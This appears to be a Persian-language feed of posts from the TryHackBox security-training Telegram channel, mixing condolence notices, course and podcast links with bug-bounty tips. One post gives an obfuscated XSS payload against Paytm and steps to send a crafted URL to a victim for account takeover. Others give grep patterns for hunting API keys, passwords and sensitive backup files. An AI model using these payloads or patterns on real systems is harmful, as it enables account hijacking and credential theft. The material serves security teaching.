دوستان این روزها کسی دل و دماغ کاری رو نداره حتی خود شما با شرایط پیش اومده .
دوستان اگر سوالی یا حرفی سخنی دارید با ما در ارتباط باشید :
@ThbxSupport
دوستان اگر سوالی یا حرفی سخنی دارید با ما در ارتباط باشید :
@ThbxSupport
❤19🕊5👎4🎃2❤🔥1🍾1
🖤 با عرض تسلیت مجدد به تمامی خانوادههای داغدار ایران، امیدوارم ما را در این داغ شریک بدانید. 🥀
⚫️ درود ! امیدوارم که حال همهمان هرچند در این لحظه دشوار، به تدریج بهتر شود.
وضعیت اینترنت همانطور که میدانید، ناپایدار است و آیندهاش نیز نامشخص به نظر میرسد. در این شرایط، ما با دلی اندوهگین تصمیم داریم بر روی محتوا تمرکز کنیم تا بتوانیم کمی از این فضای غمانگیز فاصله بگیریم و از فروپاشی روحی جلوگیری کنیم. با اینکه در این مدت تمایل چندانی به فعالیت نداشتم، اما معتقدم که انسانیت و احترام به یاد عزیزانی که دیگر در میان ما نیستند، از هر تخصصی مهمتر است.🕊
امروز که سی روز از فقدان این عزیزان است، بر خود لازم میدانیم که فعالیتهای خود را آغاز کنیم. با وجود اینکه بسیاری از افراد هنوز نتوانستهاند به اینترنت متصل شوند، ما به یاد کسانی که دیگر در کنار ما نیستند، از ایموجی های 🥀 🖤 🕊 استفاده خواهیم کرد و از شما نیز دعوت میکنیم در مطالب خود از این ایموجی ها بهره ببرید و در ریکشن ها در کانال از 🕊 استفاده کنید .
به امید روزی که دیگر شاهد چنین حوادث تلخی در کشور عزیزمان ایران نباشیم و بتوانیم با همدلی و همبستگی، آیندهای روشنتر بسازیم.🥀🖤🕊
با احترام و همدردی 🖤🥀🕊
از طرف مجموعه TryHackBox
⚫️ درود ! امیدوارم که حال همهمان هرچند در این لحظه دشوار، به تدریج بهتر شود.
وضعیت اینترنت همانطور که میدانید، ناپایدار است و آیندهاش نیز نامشخص به نظر میرسد. در این شرایط، ما با دلی اندوهگین تصمیم داریم بر روی محتوا تمرکز کنیم تا بتوانیم کمی از این فضای غمانگیز فاصله بگیریم و از فروپاشی روحی جلوگیری کنیم. با اینکه در این مدت تمایل چندانی به فعالیت نداشتم، اما معتقدم که انسانیت و احترام به یاد عزیزانی که دیگر در میان ما نیستند، از هر تخصصی مهمتر است.🕊
امروز که سی روز از فقدان این عزیزان است، بر خود لازم میدانیم که فعالیتهای خود را آغاز کنیم. با وجود اینکه بسیاری از افراد هنوز نتوانستهاند به اینترنت متصل شوند، ما به یاد کسانی که دیگر در کنار ما نیستند، از ایموجی های 🥀 🖤 🕊 استفاده خواهیم کرد و از شما نیز دعوت میکنیم در مطالب خود از این ایموجی ها بهره ببرید و در ریکشن ها در کانال از 🕊 استفاده کنید .
به امید روزی که دیگر شاهد چنین حوادث تلخی در کشور عزیزمان ایران نباشیم و بتوانیم با همدلی و همبستگی، آیندهای روشنتر بسازیم.🥀🖤🕊
🥀 جهان یادگار است و ما رفتنی
🥀به گیتی نماند به جز مردمی
با احترام و همدردی 🖤🥀🕊
از طرف مجموعه TryHackBox
🕊37❤15🔥4🤔4👍1🤩1
Try Hack Box
🚀 قسمت اول بوتکمپ SOC 0x4131! 🔗 Youtube: https://youtu.be/-lwI1ifaIXQ
🚀 قسمت دوم بوتکمپ SOC 0x4131!
در این قسمت، با مفاهیم شبکه سر و کله زدیم :
- مدل های مفهومی نتورک در عمل ما باهاشون چطور برخورد میکنیم
- پروتکل های مهم و کمک کننده چیا هستن
- مکانیزم های آدرس دهی در شبکه چیست
با بررسی این مباحث آماده میشیم که در ماژول بعد با network attack ها آشنا بشیم و تهدیدات رو شناسایی کنیم
از جلسه بعد از روند مفهوم و تئوری خارج می شویم و به سمت case study و task های SOC میریم
برای دانلود پی دی اف ارائه شده میتوانید به گیتهاب این بوتکمپ مراجعه کنید :
https://github.com/XaocZenon/SOC-0x4131
🔗 Youtube:
https://youtu.be/mumH5WWF2jM
👉 قسمتهای بعدی رو هم پیگیری کنید ! 💪 #SOC #امنیت_سایبری #بوتکمپ_SOC
@TryHackBox
در این قسمت، با مفاهیم شبکه سر و کله زدیم :
- مدل های مفهومی نتورک در عمل ما باهاشون چطور برخورد میکنیم
- پروتکل های مهم و کمک کننده چیا هستن
- مکانیزم های آدرس دهی در شبکه چیست
با بررسی این مباحث آماده میشیم که در ماژول بعد با network attack ها آشنا بشیم و تهدیدات رو شناسایی کنیم
از جلسه بعد از روند مفهوم و تئوری خارج می شویم و به سمت case study و task های SOC میریم
برای دانلود پی دی اف ارائه شده میتوانید به گیتهاب این بوتکمپ مراجعه کنید :
https://github.com/XaocZenon/SOC-0x4131
🔗 Youtube:
https://youtu.be/mumH5WWF2jM
👉 قسمتهای بعدی رو هم پیگیری کنید ! 💪 #SOC #امنیت_سایبری #بوتکمپ_SOC
@TryHackBox
🕊5❤4👍3
✍ داستان خودتونو تعریف کنید ! 🕊 چگونه بخشی از جامعه TryHackBox شدید یا در آن چه چیزی پیدا کردید؟🥀 شاید محتوای کانال توانسته براتون تغییری ایجاد کنه یا در چیزی کمکتون کرده باشه؟🖤
🕊 داستان جالب آشنایی، یا شاید یک واقعیت جالب درباره کانال یا انتقاد یا به طور کلی موضوع امنیت اطلاعات داری ؟
🖤 در کامنتها بنویسید! هر آنچه احساس میکنید و لازم میدانید را به اشتراک بگذارید درباره ی ما .
🖤🕊🥀🖤🕊🥀🖤🕊🥀🖤🕊🥀
#صحبت
🕊 داستان جالب آشنایی، یا شاید یک واقعیت جالب درباره کانال یا انتقاد یا به طور کلی موضوع امنیت اطلاعات داری ؟
🖤 در کامنتها بنویسید! هر آنچه احساس میکنید و لازم میدانید را به اشتراک بگذارید درباره ی ما .
🖤🕊🥀🖤🕊🥀🖤🕊🥀🖤🕊🥀
#صحبت
❤8🕊6👨💻2😢1
🔥 فایل های حساس روی وب سرور را شناسایی میکند.
@TryHackBox
#باگ_بانتی
cat allurls.txt | grep -E "\.xls|\.xml|\.xlsx|\.json|\.pdf|\.sql|\.doc|\.docx|\.pptx|\.txt|\.zip|\.tar\.gz|\.tgz|\.bak|\.7z|\.rar|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.gz|\.config|\.csv|\.yaml|\.md|\.md5"
تجربت کامنت کن
@TryHackBox
#باگ_بانتی
❤9🕊3🌚1
Session Fixation and Hijacking(fa).pdf
1.2 MB
آموزش
Session Fixation and Hijacking
به فارسی
اول میریم به سراغ تعریف خود Session و اهمیت session ها
سایت stateful و stateless چه تفاوتی دارد
و بعد از اون Session id ها چی هستن
و در اخر خود حملات رو توضیح میدیم و تفاوت بین شون رو متوجه میشیم
✍️نویسنده
🥀 @TryHackBox | The Chaos
Session Fixation and Hijacking
به فارسی
اول میریم به سراغ تعریف خود Session و اهمیت session ها
سایت stateful و stateless چه تفاوتی دارد
و بعد از اون Session id ها چی هستن
و در اخر خود حملات رو توضیح میدیم و تفاوت بین شون رو متوجه میشیم
✍️نویسنده
🥀 @TryHackBox | The Chaos
🔥5🕊4👍3👌1
فاز اول ردتیم قسمت اول : بدون footprint، همه چیز تارگت رو بدون!
https://x.com/i/status/2021934105630585152
@TryHackBox | @KavehOffSec
https://x.com/i/status/2021934105630585152
@TryHackBox | @KavehOffSec
X (formerly Twitter)
kaveh (@KavehxNet) on X
فاز اول Red Team قسمت اول: بدون footprint، همه چیز تارگت رو بدون!
این منابع طلایی OSINT برای پیدا کردن IP ranges، ASN، owner و تاریخچه دامنه. 🔥
طلایی برای recon اولیه بدون ردپا! 🔥
#RedTeam #OSINT
این منابع طلایی OSINT برای پیدا کردن IP ranges، ASN، owner و تاریخچه دامنه. 🔥
طلایی برای recon اولیه بدون ردپا! 🔥
#RedTeam #OSINT
❤3👍3
با کمال احترام، مراسم چهلم عزیزان از دست رفته را به دوستان، خانواده و آشنایان آنها تسلیت میگوییم. در این روزهای سخت، ما را در غم خود شریک بدانید. 🕊🖤🥀
دوستان ۲۷ و ۲۸ چهلم عزیزان از دست رفته هست ولی به دلیل فعالیت ، گفتم یادم نشه تسلیت رو عرض کنیم .🖤🕊
با آرزوی صبر و آرامش برای شما
تیم TryHackBox
دوستان ۲۷ و ۲۸ چهلم عزیزان از دست رفته هست ولی به دلیل فعالیت ، گفتم یادم نشه تسلیت رو عرض کنیم .🖤🕊
با آرزوی صبر و آرامش برای شما
تیم TryHackBox
❤29🫡14🕊5👎1
⭕️ دیگر کانال ها و شبکه های اجتماعی ما را دنبال کنید :
💠 کانال های تلگرام ما :
🔶 آموزش تست نفوذ و Red Team
🆔 @TryHackBox
🔶 رودمپ های مختلف
🆔 @TryHackBoxOfficial
🔶 داستان های هک
🆔 @TryHackBoxStory
🔶 آموزش برنامه نویسی
🆔 @TryCodeBox
🔶 رادیو زیروپاد ( پادکست ها )
🆔 @RadioZeroPod
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
👥 گروه های پرسش و پاسخ
🔷 هک و امنیت
🆔 @TryHackBoxGroup
🔷 برنامه نویسی
🆔 @TryCodeBoxGroup
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
🔴 اینستاگرام :
🔗 http://www.instagram.com/TryHackBox
🔵 یوتیوب :
🔗 https://youtube.com/@tryhackbox
🟠 گیت هاب ما :
🔗 https://github.com/TryHackBox/
🟣 لینکدین ما :
🔗 https://www.linkedin.com/company/tryhackbox-org
💠 کانال های تلگرام ما :
🔶 آموزش تست نفوذ و Red Team
🆔 @TryHackBox
🔶 رودمپ های مختلف
🆔 @TryHackBoxOfficial
🔶 داستان های هک
🆔 @TryHackBoxStory
🔶 آموزش برنامه نویسی
🆔 @TryCodeBox
🔶 رادیو زیروپاد ( پادکست ها )
🆔 @RadioZeroPod
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
👥 گروه های پرسش و پاسخ
🔷 هک و امنیت
🆔 @TryHackBoxGroup
🔷 برنامه نویسی
🆔 @TryCodeBoxGroup
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
🔴 اینستاگرام :
🔗 http://www.instagram.com/TryHackBox
🔵 یوتیوب :
🔗 https://youtube.com/@tryhackbox
🟠 گیت هاب ما :
🔗 https://github.com/TryHackBox/
🟣 لینکدین ما :
🔗 https://www.linkedin.com/company/tryhackbox-org
❤5
۷ هک اصلی ترمینال که سرعت کارت را چند برابر میکند 🔥
بیشتر کاربران در کنسول کند کار میکنند، چون قابلیتهای پایه را نمیشناسند. ساعتها وقت صرف جستوجوهای بیهوده و کارهای تکراری میشود، در حالی که همان کار را میتوان با چند دستور ساده انجام داد. اینها ابزارهایی هستند که همین امروز سرعت کارت را بهطور محسوسی افزایش میدهند.
ادامه را در لینکدین بخوانید :
https://lnkd.in/ePMmz6Fq
دوستان ما را در لینکدین دنبال کنید
🥀 @TryHackBox
بیشتر کاربران در کنسول کند کار میکنند، چون قابلیتهای پایه را نمیشناسند. ساعتها وقت صرف جستوجوهای بیهوده و کارهای تکراری میشود، در حالی که همان کار را میتوان با چند دستور ساده انجام داد. اینها ابزارهایی هستند که همین امروز سرعت کارت را بهطور محسوسی افزایش میدهند.
ادامه را در لینکدین بخوانید :
https://lnkd.in/ePMmz6Fq
دوستان ما را در لینکدین دنبال کنید
🥀 @TryHackBox
❤5🕊2
Try Hack Box
فاز اول ردتیم قسمت اول : بدون footprint، همه چیز تارگت رو بدون! https://x.com/i/status/2021934105630585152 @TryHackBox | @KavehOffSec
فاز اول Red Team قسمت دوم : منابع اوسینت و ابزارهای Recon و Relationship و ...
https://x.com/i/status/2022396326059839992
@TryHackBox | @KavehOffSec
https://x.com/i/status/2022396326059839992
@TryHackBox | @KavehOffSec
X (formerly Twitter)
kaveh (@KavehxNet) on X
فاز اول Red Team قسمت دوم : منابع اوسینت و ابزارهای Recon و Relationship و گوگل دورک ها برای استفاده در اوسینت .
در recon، قدیمیترین ابزارها اغلب مرگبارترین ضربه را میزنند.
#RedTeam #OSINT
در recon، قدیمیترین ابزارها اغلب مرگبارترین ضربه را میزنند.
#RedTeam #OSINT
❤9
🎙 قسمت سوم RadioZeroPod | داستان واقعی هک بانک با استفاده از روش های مهندسی اجتماعی
🕊 داستان واقعی هک بانک با استفاده از روش های مهندسی اجتماعی ...
🥀 این پادکست درباره نفوذ فیزیکی به یکی از بانکهای لبنان است. یک پروژه قانونی با پایانی غیرمنتظره که توسط یکی از مشهورترین متخصصان تست نفوذ فیزیکی، جیسون ای. استریت (https://jaysonestreet.com/) انجام شده است!
🕊 • کل داستان مجموعهای از واقعیتها است که با نظرات شخصی او از سخنرانیها، مصاحبهها و گفتوگوهای پشت صحنه ترکیب شده است. اگر علاقهمندید بدانید چگونه امنیت فیزیکی یک بانک با استفاده از مهندسی اجتماعی آزمایش شده پادکست را گوش بدید و نظراتتون رو بگید .
💠 https://youtu.be/g_Q3jy5yamc
🆔 @TryHackBox
🆔 @TryHackBoxOfficial
🆔 @TryHackBoxStory
🆔 @TryCodeBox
🆔 @RadioZeroPod
🕊 داستان واقعی هک بانک با استفاده از روش های مهندسی اجتماعی ...
🥀 این پادکست درباره نفوذ فیزیکی به یکی از بانکهای لبنان است. یک پروژه قانونی با پایانی غیرمنتظره که توسط یکی از مشهورترین متخصصان تست نفوذ فیزیکی، جیسون ای. استریت (https://jaysonestreet.com/) انجام شده است!
🕊 • کل داستان مجموعهای از واقعیتها است که با نظرات شخصی او از سخنرانیها، مصاحبهها و گفتوگوهای پشت صحنه ترکیب شده است. اگر علاقهمندید بدانید چگونه امنیت فیزیکی یک بانک با استفاده از مهندسی اجتماعی آزمایش شده پادکست را گوش بدید و نظراتتون رو بگید .
💠 https://youtu.be/g_Q3jy5yamc
🆔 @TryHackBox
🆔 @TryHackBoxOfficial
🆔 @TryHackBoxStory
🆔 @TryCodeBox
🆔 @RadioZeroPod
❤6👍2
🕊 دراپ کردن یه پچ XSS اخیر در Paytm!
👀 مراحل :
1. پیلود رو در search box وارد کن.
2. URL رو کپی کن.
3. به victim بفرست.
4. takeover حساب با یک کلیک!!
✅پیلود :
🥀 @TryHackBox
#باگ_بانتی #xss
👀 مراحل :
1. پیلود رو در search box وارد کن.
2. URL رو کپی کن.
3. به victim بفرست.
4. takeover حساب با یک کلیک!!
✅پیلود :
<svg onload=(new Function('\u0073\u0074\u0072\u0069\u006e\u0067\u002e\u0066\u0072\u006f\u006d\u0043\u0068\u0061\u0072\u0043\u006f\u0064\u0065\u0028\u0039\u0037\u002c\u0031\u0030\u0038\u002c\u0031\u0030\u0031\u002c\u0031\u0030\u0039\u002c\u0031\u0031\u0036\u002c\u0034\u0030\u002c\u0034\u0039\u002c\u0034\u0039\u002c\u0034\u0039\u002c\u0034\u0031\u0029'))()>
🥀 @TryHackBox
#باگ_بانتی #xss
❤5
همکاری در زمینه تدریس، تولید محتوا و پادکست
ما به دنبال دوستانی هستیم که علاقهمند به تدریس، تولید محتوا، ترجمه و همچنین فعالیت در حوزه پادکست هستند. اگر شما نیز تمایل به همکاری در این زمینهها دارید، خوشحال میشویم که با شما ارتباط برقرار کنیم.
برای کسب اطلاعات بیشتر و جزئیات همکاری، لطفاً پیام بفرستید:
@THBxSupport
ما به دنبال دوستانی هستیم که علاقهمند به تدریس، تولید محتوا، ترجمه و همچنین فعالیت در حوزه پادکست هستند. اگر شما نیز تمایل به همکاری در این زمینهها دارید، خوشحال میشویم که با شما ارتباط برقرار کنیم.
برای کسب اطلاعات بیشتر و جزئیات همکاری، لطفاً پیام بفرستید:
@THBxSupport
🕊27 و 28 و 29 بهمن چهلم عزیزانیه که خیلی زودتر از رویاهاشون به ناحق خاموش شدن..
از رفتـنِ لالههـــــا، چهـــل روز گذشت
بـا داغ جوانـــــانِ دلافــــروز گذشت
دردا، که به جــایِ وصــل، دوراِنِ فــراق
بگذشت به ما و سخت جانسـوز گذشت!
چهل روز گذشت. چهل سالم بگذره داغشون فراموش نخواهد شد،،،به یادشان که در جسمشان در بین ما نیست ولی روحشان چراغ راه آینده ایران شد🕊🌹🫡
🥀 یادشون گرامی و نامشون جاودان 🖤
از طرف تیم TryHackBox 🥀
از رفتـنِ لالههـــــا، چهـــل روز گذشت
بـا داغ جوانـــــانِ دلافــــروز گذشت
دردا، که به جــایِ وصــل، دوراِنِ فــراق
بگذشت به ما و سخت جانسـوز گذشت!
چهل روز گذشت. چهل سالم بگذره داغشون فراموش نخواهد شد،،،به یادشان که در جسمشان در بین ما نیست ولی روحشان چراغ راه آینده ایران شد🕊🌹🫡
🥀 یادشون گرامی و نامشون جاودان 🖤
از طرف تیم TryHackBox 🥀
🕊27❤10👎1😍1💯1🍾1
معرفی تیم TryHackBox به اعضای محترم کانال
درود به همه شما عزیزان!
در تیم TryHackBox، ما به آموزش و یادگیری به عنوان یک سفر هیجانانگیز نگاه میکنیم، نه صرفاً یک مقصد. برخلاف بسیاری از اکادمی های موجود، هدف ما این است که به شما کمک کنیم تا درک عمیقتری از علم و مهارتهای مورد نیاز در دنیای فناوری اطلاعات پیدا کنید.
ما معتقدیم که دورههای آموزشی میتوانند نقطه شروع خوبی باشند، اما این تنها آغاز راه است. ما شما را تشویق میکنیم تا فراتر از محتوای دورهها فکر کنید و خود را به چالش بکشید. ما دوست داریم هر یک از شما به یک جویای علم تبدیل شوید؛ کسی که با اشتیاق به دنبال کشف و یادگیری است و همواره در پی بهروز کردن مهارتهای خود میباشد.
تیم ما متشکل از افراد با تجربه در زمینههای مختلف امنیت سایبری و فناوری اطلاعات است که با عشق و علاقه، دانش خود را به شما منتقل میکنند. ما با ارائه محتوای آموزشی کاربردی و چالشهای واقعی، به شما کمک خواهیم کرد تا در دنیای پیچیده فناوری به یک متخصص واقعی تبدیل شوید.
اگر مایل به عضویت در تیم ما هستید، لطفاً با آیدی زیر در ارتباط باشید:
@ThbxSupport
با آرزوی موفقیت برای همه شما!
درود به همه شما عزیزان!
در تیم TryHackBox، ما به آموزش و یادگیری به عنوان یک سفر هیجانانگیز نگاه میکنیم، نه صرفاً یک مقصد. برخلاف بسیاری از اکادمی های موجود، هدف ما این است که به شما کمک کنیم تا درک عمیقتری از علم و مهارتهای مورد نیاز در دنیای فناوری اطلاعات پیدا کنید.
ما معتقدیم که دورههای آموزشی میتوانند نقطه شروع خوبی باشند، اما این تنها آغاز راه است. ما شما را تشویق میکنیم تا فراتر از محتوای دورهها فکر کنید و خود را به چالش بکشید. ما دوست داریم هر یک از شما به یک جویای علم تبدیل شوید؛ کسی که با اشتیاق به دنبال کشف و یادگیری است و همواره در پی بهروز کردن مهارتهای خود میباشد.
تیم ما متشکل از افراد با تجربه در زمینههای مختلف امنیت سایبری و فناوری اطلاعات است که با عشق و علاقه، دانش خود را به شما منتقل میکنند. ما با ارائه محتوای آموزشی کاربردی و چالشهای واقعی، به شما کمک خواهیم کرد تا در دنیای پیچیده فناوری به یک متخصص واقعی تبدیل شوید.
صرفاً تدریس یک دوره یا چند دوره و دریافت وجه از دانشجو کافی نیست. هدف ما این است که دانشجو واقعاً بفهمد علم فراتر از چارچوب چند دوره محدود است. این دوره تا حدی به او کمک میکند، اما پس از آن او باید با انگیزه و کنجکاوی پژوهشی به یادگیری مستقل ادامه دهد و جویای علم شود.
به جمع ما بپیوندید و با هم به سمت آیندهای روشنتر برای کشورمان در دنیای امنیت سایبری حرکت کنیم!
اگر مایل به عضویت در تیم ما هستید، لطفاً با آیدی زیر در ارتباط باشید:
@ThbxSupport
با آرزوی موفقیت برای همه شما!
❤6
✎ نکات Grep برای تحلیل جاوااسکریپت 🥀
• استخراج فایل های جاوااسکریپت از دایرکتوری های recursive
• جستوجو برای کلیدهای API و رمزها
• شناسایی فراخوانی های توابع خطرناک
• بررسی Manipulation ی URLها
• جستوجو برای درخواستهای Cross-Origin
• تحلیل استفاده از postMessage
• پیدا کردن URLها Endpoints یا Hardcoded
• شناسایی اطلاعات Debugging
• بررسی نحوه مدیریت ورودی کاربر
@TryHackBox
#باگ_بانتی #ریکان #جاوااسکریپت
• استخراج فایل های جاوااسکریپت از دایرکتوری های recursive
find /path/to/your/folders -name "*.js" -exec mv {} /path/to/target/folder/ \\;• جستوجو برای کلیدهای API و رمزها
cat * | grep -rE "apikey|api_key|secret|token|password|auth|key|pass|user"
• شناسایی فراخوانی های توابع خطرناک
cat * | grep -rE "eval|document\\.write|innerHTML|setTimeout|setInterval|Function"
• بررسی Manipulation ی URLها
cat * | grep -rE "location\\.href|location\\.replace|location\\.assign|window\\.open"
• جستوجو برای درخواستهای Cross-Origin
cat * | grep -rE "XMLHttpRequest|fetch|Access-Control-Allow-Origin|withCredentials" /path/to/js/files
• تحلیل استفاده از postMessage
cat * | grep -r "postMessage"
• پیدا کردن URLها Endpoints یا Hardcoded
cat * | grep -rE "https?://|www\\."
• شناسایی اطلاعات Debugging
cat * | grep -rE "console\\.log|debugger|alert|console\\.dir"
• بررسی نحوه مدیریت ورودی کاربر
cat * | grep -rE "document\\.getElementById|document\\.getElementsByClassName|document\\.querySelector|document\\.forms"
برای تحلیل کدهای جاوااسکریپت و شناسایی نقاط ضعف، از این نکات استفاده کنید و در نظرات خود تجربیات و یافتههای خود را به اشتراک بگذارید! چه ابزارها یا روشهای دیگری را برای بررسی کدهای جاوااسکریپت پیشنهاد میکنید؟
@TryHackBox
#باگ_بانتی #ریکان #جاوااسکریپت
10🔥17👍3❤1
دوستان عزیز،لطفاً با به اشتراکگذاری مطالب و ریکشن به پست ها، از ما حمایت کنید. همکاری شما باعث میشود تا جامعه مان را گسترش دهیم. سپاسگزاریم! 🖤🥀🕊
1❤13😍1
درود خدمت دوستان گرامی بنده اینجا روی حملات اکتیو دایرکتوری و مباحث ردتیم تمرکز خواهم کرد و سناریوها و معرفی و اطلاعات جامع در مورد پروتکل ها و موارد دیگر که تجربه بنده هست رو در اختیار شما عزیزان قرار میدهم .
@KavehOffSec
@KavehOffSec
❤18👍7🤝3🔥1